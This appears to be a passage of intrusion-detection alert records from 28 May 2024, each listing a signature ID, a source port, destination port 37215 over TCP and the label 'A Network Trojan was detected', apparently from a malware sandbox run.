            Timestamp:05/28/24-09:57:34.067811
            SID:2835222
            Source Port:52310
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507225
            SID:2829579
            Source Port:42328
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.351208
            SID:2829579
            Source Port:33630
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.814626
            SID:2829579
            Source Port:48004
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.929729
            SID:2829579
            Source Port:49238
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.921356
            SID:2829579
            Source Port:41620
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.033222
            SID:2835222
            Source Port:42120
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.774136
            SID:2835222
            Source Port:48498
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.084770
            SID:2835222
            Source Port:34454
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.423326
            SID:2835222
            Source Port:33082
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.860802
            SID:2835222
            Source Port:40414
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.882036
            SID:2829579
            Source Port:48842
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.739180
            SID:2829579
            Source Port:55816
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809125
            SID:2829579
            Source Port:37424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.815005
            SID:2829579
            Source Port:37694
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.544276
            SID:2835222
            Source Port:34080
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.956382
            SID:2829579
            Source Port:46952
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.381735
            SID:2835222
            Source Port:34880
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.273477
            SID:2829579
            Source Port:54304
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.814986
            SID:2835222
            Source Port:48228
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.605324
            SID:2829579
            Source Port:40586
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.445194
            SID:2835222
            Source Port:44492
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.885453
            SID:2835222
            Source Port:50142
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.709589
            SID:2835222
            Source Port:39396
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.779106
            SID:2835222
            Source Port:34190
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.956833
            SID:2835222
            Source Port:43368
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.445098
            SID:2835222
            Source Port:60876
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.948097
            SID:2829579
            Source Port:39696
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.669991
            SID:2835222
            Source Port:35446
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.014757
            SID:2835222
            Source Port:39666
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:49.618173
            SID:2829579
            Source Port:33818
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.251998
            SID:2835222
            Source Port:38278
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.871202
            SID:2829579
            Source Port:32938
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.956364
            SID:2835222
            Source Port:34928
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.717177
            SID:2835222
            Source Port:47622
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.047405
            SID:2835222
            Source Port:45984
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.956945
            SID:2835222
            Source Port:47748
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.051161
            SID:2829579
            Source Port:56526
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.753387
            SID:2829579
            Source Port:49924
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.346357
            SID:2829579
            Source Port:48992
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.437110
            SID:2829579
            Source Port:34566
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.312802
            SID:2829579
            Source Port:35204
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.864335
            SID:2835222
            Source Port:37230
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.326840
            SID:2835222
            Source Port:34528
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.857872
            SID:2835222
            Source Port:46840
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:09.918880
            SID:2835222
            Source Port:52758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.843856
            SID:2835222
            Source Port:37382
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.994145
            SID:2835222
            Source Port:59824
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.934987
            SID:2835222
            Source Port:45998
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.486759
            SID:2835222
            Source Port:39090
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.305454
            SID:2829579
            Source Port:39010
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:31.398021
            SID:2829579
            Source Port:39074
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.376961
            SID:2829579
            Source Port:50762
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.622706
            SID:2835222
            Source Port:39838
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.961311
            SID:2829579
            Source Port:50012
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.716845
            SID:2835222
            Source Port:55526
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.657356
            SID:2829579
            Source Port:47088
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.697401
            SID:2829579
            Source Port:59338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.893292
            SID:2829579
            Source Port:55490
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.734123
            SID:2829579
            Source Port:55492
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.330470
            SID:2835222
            Source Port:58356
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.563568
            SID:2829579
            Source Port:59228
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.709466
            SID:2835222
            Source Port:44902
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767526
            SID:2829579
            Source Port:37692
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.414273
            SID:2829579
            Source Port:36936
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.544000
            SID:2829579
            Source Port:42132
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.842163
            SID:2829579
            Source Port:41516
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.755980
            SID:2835222
            Source Port:44574
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.793661
            SID:2829579
            Source Port:39194
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.845333
            SID:2829579
            Source Port:52442
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.516596
            SID:2835222
            Source Port:49102
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.334396
            SID:2835222
            Source Port:38198
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.560079
            SID:2829579
            Source Port:33062
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.771011
            SID:2835222
            Source Port:36172
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.968438
            SID:2829579
            Source Port:47626
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.885577
            SID:2835222
            Source Port:39792
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.778465
            SID:2829579
            Source Port:39364
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.845087
            SID:2835222
            Source Port:50960
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.949764
            SID:2829579
            Source Port:56364
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.378361
            SID:2829579
            Source Port:58312
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.770916
            SID:2835222
            Source Port:54848
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.261539
            SID:2829579
            Source Port:52546
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.251376
            SID:2829579
            Source Port:36040
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.445117
            SID:2835222
            Source Port:60130
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.986078
            SID:2835222
            Source Port:42840
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:31.397480
            SID:2829579
            Source Port:39778
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.703087
            SID:2835222
            Source Port:56598
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.760306
            SID:2829579
            Source Port:39010
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.870158
            SID:2829579
            Source Port:49332
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.943018
            SID:2829579
            Source Port:41102
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.567871
            SID:2829579
            Source Port:59008
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.905167
            SID:2829579
            Source Port:33238
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.731112
            SID:2829579
            Source Port:60442
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:55.685583
            SID:2829579
            Source Port:48922
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.940359
            SID:2835222
            Source Port:38042
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.542690
            SID:2835222
            Source Port:40556
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.670379
            SID:2829579
            Source Port:54604
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.279708
            SID:2829579
            Source Port:50190
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.023621
            SID:2829579
            Source Port:48836
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.508155
            SID:2829579
            Source Port:35280
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.864292
            SID:2835222
            Source Port:50138
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.804564
            SID:2829579
            Source Port:54296
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.622972
            SID:2835222
            Source Port:48316
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.872492
            SID:2835222
            Source Port:42148
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.293582
            SID:2829579
            Source Port:53642
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.728198
            SID:2829579
            Source Port:47356
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.040642
            SID:2829579
            Source Port:60996
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.909236
            SID:2835222
            Source Port:60710
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.190914
            SID:2829579
            Source Port:44444
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.952944
            SID:2829579
            Source Port:45190
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.945443
            SID:2829579
            Source Port:52402
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.919498
            SID:2835222
            Source Port:60050
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.914004
            SID:2835222
            Source Port:32868
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.857907
            SID:2829579
            Source Port:56186
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.040376
            SID:2829579
            Source Port:52688
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.185406
            SID:2829579
            Source Port:38392
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.050520
            SID:2835222
            Source Port:42838
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.663927
            SID:2835222
            Source Port:47728
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.842866
            SID:2829579
            Source Port:50116
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:38.473847
            SID:2829579
            Source Port:53438
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.057865
            SID:2835222
            Source Port:46652
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.827694
            SID:2829579
            Source Port:39630
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.152864
            SID:2835222
            Source Port:50064
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.746476
            SID:2835222
            Source Port:40998
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.817637
            SID:2835222
            Source Port:40442
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.334755
            SID:2829579
            Source Port:52648
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.885707
            SID:2835222
            Source Port:58996
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.611503
            SID:2835222
            Source Port:50514
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.030921
            SID:2829579
            Source Port:50320
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.753673
            SID:2829579
            Source Port:58172
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.058826
            SID:2829579
            Source Port:60076
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.519081
            SID:2835222
            Source Port:53778
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.887645
            SID:2835222
            Source Port:60812
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.922748
            SID:2835222
            Source Port:50382
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.515912
            SID:2829579
            Source Port:53762
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.929869
            SID:2835222
            Source Port:57456
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.843726
            SID:2835222
            Source Port:55474
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.709991
            SID:2835222
            Source Port:39378
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.887240
            SID:2829579
            Source Port:38020
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.944905
            SID:2829579
            Source Port:45778
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.604440
            SID:2829579
            Source Port:57818
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.860807
            SID:2829579
            Source Port:46834
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.881195
            SID:2829579
            Source Port:55390
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.717731
            SID:2835222
            Source Port:33408
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.434651
            SID:2829579
            Source Port:44662
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.811750
            SID:2835222
            Source Port:53216
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.474038
            SID:2835222
            Source Port:39532
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.776903
            SID:2829579
            Source Port:38260
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.946274
            SID:2829579
            Source Port:45066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.756648
            SID:2835222
            Source Port:60052
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.706408
            SID:2829579
            Source Port:58548
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.923596
            SID:2835222
            Source Port:38462
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:43.537253
            SID:2835222
            Source Port:36754
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.047952
            SID:2829579
            Source Port:40804
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.069979
            SID:2829579
            Source Port:34222
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.010465
            SID:2829579
            Source Port:41166
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.840597
            SID:2829579
            Source Port:54960
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.308746
            SID:2829579
            Source Port:51842
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.818200
            SID:2835222
            Source Port:55226
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.880077
            SID:2829579
            Source Port:42072
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.868497
            SID:2835222
            Source Port:47406
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.644797
            SID:2829579
            Source Port:39150
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.485936
            SID:2835222
            Source Port:45196
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.612023
            SID:2829579
            Source Port:39832
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.746113
            SID:2835222
            Source Port:50964
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.376903
            SID:2835222
            Source Port:40362
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.333262
            SID:2829579
            Source Port:36032
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.897616
            SID:2835222
            Source Port:42678
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.471282
            SID:2829579
            Source Port:52874
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.929941
            SID:2829579
            Source Port:37498
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.669927
            SID:2835222
            Source Port:40964
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.896125
            SID:2829579
            Source Port:52234
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.826103
            SID:2829579
            Source Port:35870
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.968572
            SID:2835222
            Source Port:47638
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.872774
            SID:2829579
            Source Port:33686
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.996222
            SID:2829579
            Source Port:56262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.065411
            SID:2835222
            Source Port:44758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.999285
            SID:2829579
            Source Port:53368
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.052828
            SID:2829579
            Source Port:39424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.663870
            SID:2835222
            Source Port:44558
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.817623
            SID:2829579
            Source Port:47742
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.047855
            SID:2829579
            Source Port:51396
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.887386
            SID:2829579
            Source Port:46342
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.771623
            SID:2835222
            Source Port:54530
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.277535
            SID:2835222
            Source Port:53140
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.814308
            SID:2829579
            Source Port:37808
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.776664
            SID:2829579
            Source Port:36654
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.932060
            SID:2829579
            Source Port:49946
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.805568
            SID:2829579
            Source Port:37722
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.841166
            SID:2835222
            Source Port:33342
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.913479
            SID:2829579
            Source Port:50154
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.866964
            SID:2829579
            Source Port:39624
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:15.950306
            SID:2835222
            Source Port:35600
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.068586
            SID:2835222
            Source Port:56622
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.776699
            SID:2829579
            Source Port:37618
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.067101
            SID:2829579
            Source Port:34828
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.343262
            SID:2829579
            Source Port:38126
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.953424
